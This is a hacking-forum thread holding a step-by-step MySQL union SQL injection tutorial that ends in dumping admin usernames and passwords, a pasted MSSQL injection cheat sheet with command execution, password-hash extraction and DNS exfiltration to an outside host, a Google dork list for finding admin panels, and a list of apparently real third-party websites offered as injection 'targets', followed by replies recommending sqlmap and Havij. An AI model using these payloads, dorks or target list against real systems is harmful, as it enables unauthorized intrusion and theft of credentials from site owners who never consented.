Thread Rating:
  • 1 Vote(s) - 3 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Mysql Injection Tutorial
#1
Mysql has 2 types only as mentioned above.you need to know the following things about the DB you are attacking-

   # Number of columns
   # Table names
   # column names

   # Let's start with union Attack, the most common, every n00b should no it -

   Code:

 
Code:
 => http://test.com/index.php?id=1 order by 10--

   ^ This gives me an error

   Let's again try

   Code:

 
Code:
=> http://test.com/index.php?id=1 order by 7--

   ^ This gives me an error

   Let's try again

   Code:

 
Code:
=> http://test.com/index.php?id=1 order by 5--

   Whoa !! the page is Loading normally

   It means, Number of columns => 5
   you can do it with mssql as well.

   # Now the next part-
   I'm using union select statement.

   Code:

 
Code:
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--

   If it doesn't gives you anything, change the first part of the query to a negative value.

   Code:

   
Code:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--

   It'll show some number on you screen. In my case it is 2. Now we know that column 2 will echo data back to us.

   # getting Mysql version

   Code:

   
Code:
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
   If you do not get with this try this-

   Code:

   
Code:
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
   Now you will get get the version name

   it can be-

   # 5+
   # 5>

   XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

   Table extraction for version 5+ :

   Code:

 
Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

   It'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info
   So, In my case I need to exploit into a table named => admin

   which contains information, I need

   Now I got the Tables names & I need to extract the column names from them so the query will be-

   Code:

   
Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

   This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.
   I use hackbar, a Firefox addon to do so.

   so char of admin is =>CHAR(97, 100, 109, 105, 110)

   therefore the query will be-

   =>
   Code:

 
Code:
http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

   It show the columns names to me. In my case they are-

   # user_name
   # user_password
   # sex
   # uid

   We only need to know username & pass so we reject the rest two. Okay ?

   The next query will be for extracting the final data I need-

 
Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--

   where 0x3a is the hex value of => :

   VOILA !

   I got the username & pass, it is => adminassword

   password can also be encrypted. So you can use few online decrypters or a software I know => Password Pro


Code:
** Some of the queries in the table below can only be run by an admin (SA Privilege).
These are marked with "-- priv" at the end of the query. **

+---------------+---------------------------------------------------------------------------+
|    Version    | SELECT @@version    |
|---------------|---------------------------------------------------------------------------|
|   Comments    | SELECT 1 -- comment    |
|               | SELECT /*comment*/1    |
|---------------|---------------------------------------------------------------------------|
| | SELECT user_name();    |
|               | SELECT system_user;    |
| Current User | SELECT user;    |
|               | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID    |
|---------------|---------------------------------------------------------------------------|
|  List Users   | SELECT name FROM master..syslogins    |
|---------------|---------------------------------------------------------------------------|
| | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv    |
| |    |
|     |     SELECT name, master.dbo.fn_varbintohexstr(password)            |
| |     FROM master..sysxlogins -- priv    |
| List Password |    |
|    Hashes | MSSQL2005: SELECT name, password_hash FROM    |
| |     master.sys.sql_logins -- priv    |
|     |    |
| |     SELECT name + '-' +    |
| |     master.sys.fn_varbintohexstr(password_hash)    |
| |     FROM master.sys.sql_logins -- priv    |
|---------------|---------------------------------------------------------------------------|
| | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?    |
| | returns 1 for true, 0 for false, NULL for invalid role.    |
| | Also try 'bulkadmin', 'systemadmin' and other values.    |
|   List DBA |    |
|   Accounts |    |
| | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin?    |
| | return 1 for true, 0 for false, NULL for invalid role/username.    |
|---------------|---------------------------------------------------------------------------|
|   Current DB  | SELECT DB_NAME()    |
|---------------|---------------------------------------------------------------------------|
|     List | SELECT name FROM master..sysdatabases;    |
|   Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ...    |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE   |    
| | name = 'mytable'); -- for the current DB only    |
| |    |
| List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM  |
| | master..syscolumns, master..sysobjects WHERE    |
| | master..syscolumns.id=master..sysobjects.id AND    |
| | master..sysobjects.name='sometable'; -- list colum names    |
| | and types for master..sometable    |
|---------------|---------------------------------------------------------------------------|
| | SELECT name FROM master..sysobjects WHERE xtype = 'U';    |
| | (Use xtype = 'V' for views)    |
| | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';    |
| |    |
|  List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype)    |
| | FROM master..syscolumns, master..sysobjects WHERE    |
| | master..syscolumns.id=master..sysobjects.id AND    |
| | master..sysobjects.name='sometable'; -- list column names and types    |
| | for master..sometable    |
|---------------|---------------------------------------------------------------------------|
| | -- NB: This example works only for the current database.    |
| | If you wan't to search another db, you need to specify the db name    |
|  Find Tables | (e.g. replace sysobject with mydb..sysobjects).    |
|     From |    |
|  Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname    |
| | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id    |
| | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --    |
| | this lists table, column for each column containing the word 'password'   |
|---------------|---------------------------------------------------------------------------|
|    Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins    |
|    Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row    |
|---------------|---------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c    |
|---------------|---------------------------------------------------------------------------|
|  Bitwise AND  | SELECT 6 & 2 -- returns 2    |
| | SELECT 6 & 1 -- returns 0    |
|---------------|---------------------------------------------------------------------------|
|  ASCII Value | SELECT char(0x41) -- returns A    |
|   -> Char |    |
|---------------|---------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') - returns 65    |
|     Value |    |
|---------------|---------------------------------------------------------------------------|
|    Casting    | SELECT CAST('1' as int);    |
| | SELECT CAST(1 as char)    |
|---------------|---------------------------------------------------------------------------|
|    String | SELECT 'A' + 'B' - returns AB    |
| Concatenation |    |
|---------------|---------------------------------------------------------------------------|
| If Statement  | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1    |
|---------------|---------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1    |
|---------------|---------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB    |
|---------------|---------------------------------------------------------------------------|
|  Time Delay   | WAITFOR DELAY '0:0:5' -- pause for 5 seconds    |
|---------------|---------------------------------------------------------------------------|
| | declare @host varchar(800); select @host = name FROM master..syslogins;   |
| | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');    |
| | -- nonpriv, works on 2000    |
| |    |
| | declare @host varchar(800); select @host = name + '-' +    |
|     Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net'    |
| DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
| | -- priv, works on 2005    |
| |    |
| | -- NB: Concatenation is not allowed in calls to these SPs, hence why we   |
| | have to use @host.  Messy but necessary.    |
| | -- Also check out theDNS tunnel feature of sqlninja    |
|---------------|---------------------------------------------------------------------------|
|    Command | EXEC xp_cmdshell 'net user'; -- priv    |
|   Execution   |    |
|---------------|---------------------------------------------------------------------------|
|     Local | CREATE TABLE mydata (line varchar(8000));    |
|  File Access | BULK INSERT mydata FROM 'c:\boot.ini';    |
| | DROP TABLE mydata;    |
|---------------|---------------------------------------------------------------------------|
| Hostname, IP  | SELECT HOST_NAME()    |
|---------------|---------------------------------------------------------------------------|
| Create Users  | EXEC sp_addlogin 'user', 'pass'; -- priv    |
|---------------|---------------------------------------------------------------------------|
|  Drop Users   | EXEC sp_droplogin 'user'; -- priv    |
|---------------|---------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv    |
+---------------+---------------------------------------------------------------------------+


Sql Dork List: ( Admin Panel D0RKS )

Code:
"inurl:admin/addproduct.asp"
"inurl:admin/user.asp"
"inurl:admin/addpage.php"
"inurl:admin/gallery.asp"
"inurl:admin/image.asp"
"inurl:admin/adminuser.asp"
"inurl:admin/productadd.asp"
"inurl:admin/addadmin.asp"
"inurl:admin/add_admin.asp"
"inurl:admin/add_admin.php"
"inurl:admin/addnews.asp"
"inurl:admin/addpost"
inurl"inurl:admin/addforum.???"
"inurl:admin/addgame.???"
"inurl:admin/addblog.????"
"inurl:admin/admin_detail.php"
"inurl:admin/admin_area.php"
"inurl:admin/product_add.php"
"inurl:admin/additem.php"
"inurl:admin/addstore.php"
"inurl:admin/add_Products.???"
"inurl:admin/showbook.???"
"inurl:admin/selectitem.???"
"allinurl:admin/addfile.???"
"inurl:admin/addarticle.asp"
"inurl:admin/addfile.asp"
"inurl:admin/upload.php"
"inurl:admin/upload.asp"
"inurl:admin/addstory.php"
"inurl:admin/addshow.php"
"inurl:admin/addmember.asp"
"inurl:admin/addinfo.asp"
"inurl:admin/addcat.asp"
"inurl:admin/cp.asp"
"inurl:admin/productshow.asp"
"inurl:admin/addjob.asp"
"inurl:admin/addjob.???"
"inurl:admin/addpic.???"
"inurl:admin/viewproduct.???"
"inurl:admin/addaccount.php"
"inurl:admin/manage.php"
"inurl:admin/addcontact.???"
"inurl:admin/viewmanager.???"
"inurl:admin/addschool.???"
"inurl:admin/addproject.???"
"inurl:admin/addsale.???"
"inurl:admin/addcompany.???"
"inurl:admin/payment.???"
"inurl:user/emp.???"
"inurl:admin/addmovie.???"
"inurl:admin/addpassword.???"
"inurl:admin/addemployee.???"
"inurl:admin/addcat.???"
"inurl:admin/admin.???"
"inurl:admin/admincp.???"
"inurl:admin/settings.???"
"inurl:admin/addstate.???"
"inurl:admin/addcountry.???"
"inurl:admin/addmedia.???"
"inurl:admin/addcode.???"
"inurl:admin/addlinks.???"
"inurl:admin/addcity.???"

Some targets for those who want to train sql injection

Code:
http://www.harrisburgu.net/news/article.php?id='416
http://www.pornkruba.net/article.php?id='11012&lang='th
http://www.saveoureverglades.org/article.php?id='1  
http://www.plusline.org/article.php?id='6068
http://www.unitedpurpose.org/archive/article.php?id='100  
http://www.website-design-lincolnshire.co.uk/article.php?id='59
http://www.israel-diaspora.info/article.php?id='853
http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid='49485&TypeOfPage='2
http://www.positivenetworks.com/page.php?pageID='3
http://www.turkey-re.com/system/main.php?pageid='2616&articleid='3687&objectid='10032
http://www.europe-re.com/system/main.php?objectid='10146&objectopt='news&pageid='2236
http://www.kalonjirecords.com/index.php?pageID='237
https://www.positivenetworks.com/page.php?pageID='122
http://www.lovemarks.com/index.php?pageID='20016&lmvideoid='106
http://www.holland-real-estate.net/system/main.php?pageid='2499&acthmalt='6003
http://www.ellabakercenter.org/page.php?pageid='32
http://www.sizzla.org/index.php?pageID='237
http://www.dioceseduluth.org/index.php?PageID='217
http://bayareasilencetheviolence.org/page.php?pageid='82&contentid='289
http://www.irrawaddy.org/research.php?pageid='2
http://www.rauchfrei2008.de/index.php?pageID='47
http://www.kbs-spritztechnik.de/cms.php?pageId='31&lan='1
http://www.sensordynamics.cc/cms/cms.php?pageId='73
http://www.garo.cc/text.php?pageid='16
http://www.linux-tutorial.info/modules.php?name='MContent&pageid='99
http://www.qualitystone.info/?head='1&pageid='19&language='latvian&PHPSESSID='9fd5bc457adda664a210c2bed368dd07
http://www.waterloo.k12.ia.us/schools/index.php?pageid='934
http://www.yoquierogames.com/games.php?id='98
http://game.thai4promotion.com/games.php?id='3289
http://www.marmoon.com/games.php?id='437
http://www.wichitafallscommerce.com/newsDetail.php?id='57
http://www.dutchiefanclub.com/newsdetail.php?id='66
http://pro-stance.com/newsdetail.php?id='3   -
http://www.dutchtub.com/english00/newsdetail.php?id='207&titel='eco_gadget_of_the_year!
http://www.tango04.com/news/newsdetail.php?id='361
http://www.cccp.com/NewsDetail.php?ID='13
http://www.foldingbikechallenge.com/newsdetail.php?ID='9
http://www.ukgraffiti.com/ukgv3/news/newsdetail.php?id='26
http://www.evt-me.com/newsDetail.php?id='8  
http://www.intermaritimeservices.com/newsdetail.php?id='46
http://www.adit-uae.com/news/newsDetail.php?id='16
http://www.worldmissphotogenic.com/newsdetail.php?id='1
http://www.motherwiseyoga.com/newsDetail.php?id='23
Reply
#2
thank you very much for this information Smile
Reply
#3
Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?
Reply
#4
(03-01-2017, 07:02 PM)Mrifnoc Wrote:  Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?

Yes, the most useful for your purpose is sqlmap.
Here you can easy understand how to use this pretty automatic SQL injection and database takeover tool sqlmap wiki
Also, sqlmap is a part of kali linux distr.

Respect the law. All what I say this is just for your information.
Reply
#5
(03-01-2017, 08:29 PM)adasakura Wrote:  
(03-01-2017, 07:02 PM)Mrifnoc Wrote:  Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?

Yes, the most useful for your purpose is sqlmap.
Here you can easy understand how to use this pretty automatic SQL injection and database takeover tool sqlmap wiki
Also, sqlmap is a part of kali linux distr.

Respect the law. All what I say this is just for your information.

Approve! Really good working toy!
Reply
#6
Thanks for info dude.
Reply
#7
use havij pro, it hax sites XdxdXd
Reply
#8
Damn! That's a lot of detailed information for a TuT on here ! :O Thanks for helping out!
Reply
#9
Very well done. tq!! Smile
Reply
#10
thank you very much for this tutorial men!!
Reply
#11
thank you for this great informations i learned some new tips
Reply
#12
(03-22-2017, 08:23 PM)algerianodz Wrote:  thank you for this great informations i learned some new tips

Jump off a bridge.
Reply
 


Possibly Related Threads...
Thread Author Replies Views Last Post
Information Mirai Botnet [FULL TUTORIAL] Xiu 9 1,934 10-13-2018, 07:02 PM
Last Post: p4nther
Thumbsup How to use PGP [Tutorial] Z0MBys 1 105 10-09-2018, 04:12 PM
Last Post: darksh33p
  Tutorial Hacking and Cracking in 3GB Data video and texte Miakhalifa 1 168 10-08-2018, 06:59 AM
Last Post: ihaveraidedforums
  [TUTORIAL] Seller In The Middle guide, make money on Bitify $Working Method Crusherguzz 3 434 09-08-2018, 04:01 AM
Last Post: Sticky
  SQLI Dumper + Custom HQ DORKS [Tutorial] GangMember 24 9,363 08-23-2018, 06:52 PM
Last Post: ausardevendra



Users browsing this thread: 1 Guest(s)